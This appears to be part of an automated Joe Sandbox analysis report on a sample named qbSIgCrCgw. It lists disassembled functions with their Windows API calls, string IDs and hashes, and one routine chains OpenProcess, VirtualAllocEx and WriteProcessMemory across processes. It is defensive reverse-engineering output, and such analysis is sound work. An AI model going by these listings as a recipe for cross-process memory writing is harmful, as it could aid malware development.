                                                                                • KillTimer.USER32(?,0000040A), ref: 003EECDF
                                                                                • EndDialog.USER32(?,00000001), ref: 003EECF9
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                • String ID:
                                                                                • API String ID: 3741023627-0
                                                                                • Opcode ID: 1aec426f20b94cd2325349272fabedffb7d6c55ad5c7bc2f87ba29e3dfe42329
                                                                                • Instruction ID: d0a8cc6fc9390280f5667212ff3ffb6176decc424e3c8dc1dac675485a709f66
                                                                                • Opcode Fuzzy Hash: 1aec426f20b94cd2325349272fabedffb7d6c55ad5c7bc2f87ba29e3dfe42329
                                                                                • Instruction Fuzzy Hash: C801A930900764EBEB255B21EE4EB9677BCFF00B05F101669F693614E1DBF4A954CB44
                                                                                Function 003CB0AB Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • EndPath.GDI32(?), ref: 003CB0BA
                                                                                • StrokeAndFillPath.GDI32(?,?,0042E680,00000000,?,?,?), ref: 003CB0D6
                                                                                • SelectObject.GDI32(?,00000000), ref: 003CB0E9
                                                                                • DeleteObject.GDI32 ref: 003CB0FC
                                                                                • StrokePath.GDI32(?), ref: 003CB117
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                • String ID:
                                                                                • API String ID: 2625713937-0
                                                                                • Opcode ID: 47c38e8e8df9d0fb0561d15b6e1dc770820166a32fa646e94ece9f51d787cf3e
                                                                                • Instruction ID: f892ef78d0269b34858b09259f75e0b7cf92e1ec1a07c0b4e3324db7e2c8986c
                                                                                • Opcode Fuzzy Hash: 47c38e8e8df9d0fb0561d15b6e1dc770820166a32fa646e94ece9f51d787cf3e
                                                                                • Instruction Fuzzy Hash: 1DF0C930400244EFDB269F79EC4DB597B75B710766F188329F469850F0C7318999DF58
                                                                                Function 003FF23D Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 277comCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CoInitialize.OLE32(00000000), ref: 003FF2DA
                                                                                • CoCreateInstance.OLE32(0043DA7C,00000000,00000001,0043D8EC,?), ref: 003FF2F2
                                                                                • CoUninitialize.OLE32 ref: 003FF555
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: CreateInitializeInstanceUninitialize
                                                                                • String ID: .lnk
                                                                                • API String ID: 948891078-24824748
                                                                                • Opcode ID: 1ebe657e3c4c1e1341241358ca4599904e60c7efb59fced08cd65acf9ad99131
                                                                                • Instruction ID: f11363ceaca9703196b9321a9da9f0bf67b3488e36ae9804dbbb7e72fffe3269
                                                                                • Opcode Fuzzy Hash: 1ebe657e3c4c1e1341241358ca4599904e60c7efb59fced08cd65acf9ad99131
                                                                                • Instruction Fuzzy Hash: 90A11B71504201AFD301EF64C881EAFB7ECEF98718F00491DF6559B1A2EB70EA49CB52
                                                                                Function 003FE7DD Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 003B660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003B53B1,?,?,003B61FF,?,00000000,00000001,00000000), ref: 003B662F
                                                                                • CoInitialize.OLE32(00000000), ref: 003FE85D
                                                                                • CoCreateInstance.OLE32(0043DA7C,00000000,00000001,0043D8EC,?), ref: 003FE876
                                                                                • CoUninitialize.OLE32 ref: 003FE893
                                                                                  • Part of subcall function 003B936C: __swprintf.LIBCMT ref: 003B93AB
                                                                                  • Part of subcall function 003B936C: __itow.LIBCMT ref: 003B93DF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                                • String ID: .lnk
                                                                                • API String ID: 2126378814-24824748
                                                                                • Opcode ID: 2b140041bcbfe487e46188db12eaf23166e9d00fd2ec72ca3a83ec7c7b995cf5
                                                                                • Instruction ID: d1195e769fa170fbb4319c95bc65e2ee1601a45a7c75c0d24add075d61544422
                                                                                • Opcode Fuzzy Hash: 2b140041bcbfe487e46188db12eaf23166e9d00fd2ec72ca3a83ec7c7b995cf5
                                                                                • Instruction Fuzzy Hash: 9BA176356043059FCB11EF14C884E6EBBE5BF88314F158959FA9A9B3A1CB31EC45CB91
                                                                                Function 003D325D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __startOneArgErrorHandling.LIBCMT ref: 003D32ED
                                                                                  • Part of subcall function 003DE0D0: __87except.LIBCMT ref: 003DE10B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorHandling__87except__start
                                                                                • String ID: pow
                                                                                • API String ID: 2905807303-2276729525
                                                                                • Opcode ID: c02089da0d947e5db59573bef11e4b491b4db120acc92c1b5955a3221d17fcfd
                                                                                • Instruction ID: f7ab819fb3a57dd846287beb787339c58f873f81738673e6a4c3ec47be46db8f
                                                                                • Opcode Fuzzy Hash: c02089da0d947e5db59573bef11e4b491b4db120acc92c1b5955a3221d17fcfd
                                                                                • Instruction Fuzzy Hash: FC516867F0820192CB137714FA0137E6FA8AB41710F208D2BF0D58A3A9DF748ED49647
                                                                                Function 003F4606 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,0044DC50,?,0000000F,0000000C,00000016,0044DC50,?), ref: 003F4645
                                                                                  • Part of subcall function 003B936C: __swprintf.LIBCMT ref: 003B93AB
                                                                                  • Part of subcall function 003B936C: __itow.LIBCMT ref: 003B93DF
                                                                                • CharUpperBuffW.USER32(?,?,00000000,?), ref: 003F46C5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: BuffCharUpper$__itow__swprintf
                                                                                • String ID: REMOVE$THIS
                                                                                • API String ID: 3797816924-776492005
                                                                                • Opcode ID: 3fe15131b744e22bd300d22fa92bdd451453a6f034126cf4356570b7f9d44ef5
                                                                                • Instruction ID: 3897e50d6830c08c034b26b34dd6e54770dfa954ff20968126ad543322be87d8
                                                                                • Opcode Fuzzy Hash: 3fe15131b744e22bd300d22fa92bdd451453a6f034126cf4356570b7f9d44ef5
                                                                                • Instruction Fuzzy Hash: 94414234A0021D9FCF02EF54C881ABEB7B5FF49304F148469EA16AB661DB74DD45CB50
                                                                                Function 003EC189 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 003F430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,003EBC08,?,?,00000034,00000800,?,00000034), ref: 003F4335
                                                                                • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 003EC1D3
                                                                                  • Part of subcall function 003F42D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,003EBC37,?,?,00000800,?,00001073,00000000,?,?), ref: 003F4300
                                                                                  • Part of subcall function 003F422F: GetWindowThreadProcessId.USER32(?,?), ref: 003F425A
                                                                                  • Part of subcall function 003F422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,003EBBCC,00000034,?,?,00001004,00000000,00000000), ref: 003F426A
                                                                                  • Part of subcall function 003F422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,003EBBCC,00000034,?,?,00001004,00000000,00000000), ref: 003F4280
                                                                                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 003EC240
                                                                                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 003EC28D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                • String ID: @
                                                                                • API String ID: 4150878124-2766056989
                                                                                • Opcode ID: f2e17e7c7d27157ae1412044ab381b6be61abc5dab34bbe991279ed244463fb6
                                                                                • Instruction ID: f4bcbcb1ff0e9bf53cbd0e3784d8247f007f357cdae247465b005254715636bf
                                                                                • Opcode Fuzzy Hash: f2e17e7c7d27157ae1412044ab381b6be61abc5dab34bbe991279ed244463fb6
                                                                                • Instruction Fuzzy Hash: 62413A7690021CBFDB12DFA4CC82AEEB7B8BF09300F004595FA55BB181DA71AE55CB61
                                                                                Function 0041A63F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0044DC00,00000000,?,?,?,?), ref: 0041A6D8
                                                                                • GetWindowLongW.USER32 ref: 0041A6F5
                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0041A705
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Long
                                                                                • String ID: SysTreeView32
                                                                                • API String ID: 847901565-1698111956
                                                                                • Opcode ID: 9e5a470fb0501c2c154f36b86e223992d3a3a861965c1e5947154813dee05c02
                                                                                • Instruction ID: 2c490bd3f77b2603d5cc0153c1f4ca1f46a5327a93b72bee986958de91bb2aa8
                                                                                • Opcode Fuzzy Hash: 9e5a470fb0501c2c154f36b86e223992d3a3a861965c1e5947154813dee05c02
                                                                                • Instruction Fuzzy Hash: 4C31A031601205ABDB118E38DC41BE777A9EB49324F244726F8B5932E0D734EDA08B59
                                                                                Function 00405180 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 96networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 00405190
                                                                                • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 004051C6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: CrackInternet_memset
                                                                                • String ID: |$D@
                                                                                • API String ID: 1413715105-3930294801
                                                                                • Opcode ID: 92059676987da3e651f4344a3794b74fb7a9773dae8fe1842e9033d5c1526b13
                                                                                • Instruction ID: 804d9ae25570695d3f72bbe30048b6616f1289afe6dd16bb24ae8d25f6da3865
                                                                                • Opcode Fuzzy Hash: 92059676987da3e651f4344a3794b74fb7a9773dae8fe1842e9033d5c1526b13
                                                                                • Instruction Fuzzy Hash: 68313A71C10119ABCF11EFA4CC45AEE7FB9FF54704F00006AE915AA166DB35A906CF60
                                                                                Function 0041A0D6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 0041A15E
                                                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 0041A172
                                                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 0041A196
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$Window
                                                                                • String ID: SysMonthCal32
                                                                                • API String ID: 2326795674-1439706946
                                                                                • Opcode ID: ee0184631fc63608bb80f3c6a23c2f04102c527d396c3e666e8d04ba5e62a71e
                                                                                • Instruction ID: f5d6108f916b48e2d0afc95204388edf120534d101302a5babfd491961ecdae1
                                                                                • Opcode Fuzzy Hash: ee0184631fc63608bb80f3c6a23c2f04102c527d396c3e666e8d04ba5e62a71e
                                                                                • Instruction Fuzzy Hash: 23219F32510218BBDF128FA4CC42FEA3B79EF48714F110215FE55AB1D0D6B9ACA5CBA4
                                                                                Function 0041A88A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0041A941
                                                                                • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0041A94F
                                                                                • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0041A956
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$DestroyWindow
                                                                                • String ID: msctls_updown32
                                                                                • API String ID: 4014797782-2298589950
                                                                                • Opcode ID: b9e84c534852a28fff63e5278e17cc820c4d16327a14b743c895c617c8367472
                                                                                • Instruction ID: c13b3094601b90cd96ba88163aadf8c14a96177a2111b4e280e2b17606a6ad15
                                                                                • Opcode Fuzzy Hash: b9e84c534852a28fff63e5278e17cc820c4d16327a14b743c895c617c8367472
                                                                                • Instruction Fuzzy Hash: 3F21B2B5610209AFDB01DF28DC82DB737ACEB5A354B05045AFA04DB361CB34EC918B65
                                                                                Function 004199A5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00419A30
                                                                                • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00419A40
                                                                                • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00419A65
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$MoveWindow
                                                                                • String ID: Listbox
                                                                                • API String ID: 3315199576-2633736733
                                                                                • Opcode ID: d1cb35c0c0ad214622a4466156344db4c645d58e361ba33142b74a475713ce6f
                                                                                • Instruction ID: 576544b0101fd67c709e39e07781f77d875b1fa12fe2f91f381fd6d56d378e50
                                                                                • Opcode Fuzzy Hash: d1cb35c0c0ad214622a4466156344db4c645d58e361ba33142b74a475713ce6f
                                                                                • Instruction Fuzzy Hash: FD213772610108BFDF118F54CC81FFF3BAAEF89750F01812AF9049B290C6759C9187A4
                                                                                Function 0041A409 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0041A46D
                                                                                • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 0041A482
                                                                                • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 0041A48F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend
                                                                                • String ID: msctls_trackbar32
                                                                                • API String ID: 3850602802-1010561917
                                                                                • Opcode ID: 0705670f57666f3f2a6d046736bbedf74c1c51a7c47c7e0aac811e5eb4152518
                                                                                • Instruction ID: e2d6012b3f758b8747a5425eba68a7df37786dcb3b298c5ae9fae155581c1851
                                                                                • Opcode Fuzzy Hash: 0705670f57666f3f2a6d046736bbedf74c1c51a7c47c7e0aac811e5eb4152518
                                                                                • Instruction Fuzzy Hash: 43110A71200208BEEF209F65CC49FEB3769EF89754F01412DFA4596191D2B5E861C728
                                                                                Function 003D2287 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,003D2350,?), ref: 003D22A1
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 003D22A8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: AddressLibraryLoadProc
                                                                                • String ID: RoInitialize$combase.dll
                                                                                • API String ID: 2574300362-340411864
                                                                                • Opcode ID: a6ddceb71a0353b520b63cb37bb9fe5966420dfbfcad093021d6bc9c258bedf9
                                                                                • Instruction ID: 148bb7d154000eb35c718d284e21257c5bc5cb1a1b3bd24a47b5ebc75022e18c
                                                                                • Opcode Fuzzy Hash: a6ddceb71a0353b520b63cb37bb9fe5966420dfbfcad093021d6bc9c258bedf9
                                                                                • Instruction Fuzzy Hash: 78E01270A95300EBEB616F70FD4AB163B68EB14B06F905431F186E61A4DBFA40A0DF0D
                                                                                Function 003D235C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,003D2276), ref: 003D2376
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 003D237D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: AddressLibraryLoadProc
                                                                                • String ID: RoUninitialize$combase.dll
                                                                                • API String ID: 2574300362-2819208100
                                                                                • Opcode ID: 2bc21d84c02644e170347885edd7f7891dd3491c321deed680ea1f4cd76d39a3
                                                                                • Instruction ID: a562d975cb59e265ab4e51799d7a3669206b32e737631964218e9d45b04d37b9
                                                                                • Opcode Fuzzy Hash: 2bc21d84c02644e170347885edd7f7891dd3491c321deed680ea1f4cd76d39a3
                                                                                • Instruction Fuzzy Hash: 05E0B674946300EBDB216F61FD0DB053A64F714706F511435F10DE21B0DBFA94A09A5D
                                                                                Function 0042AC59 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
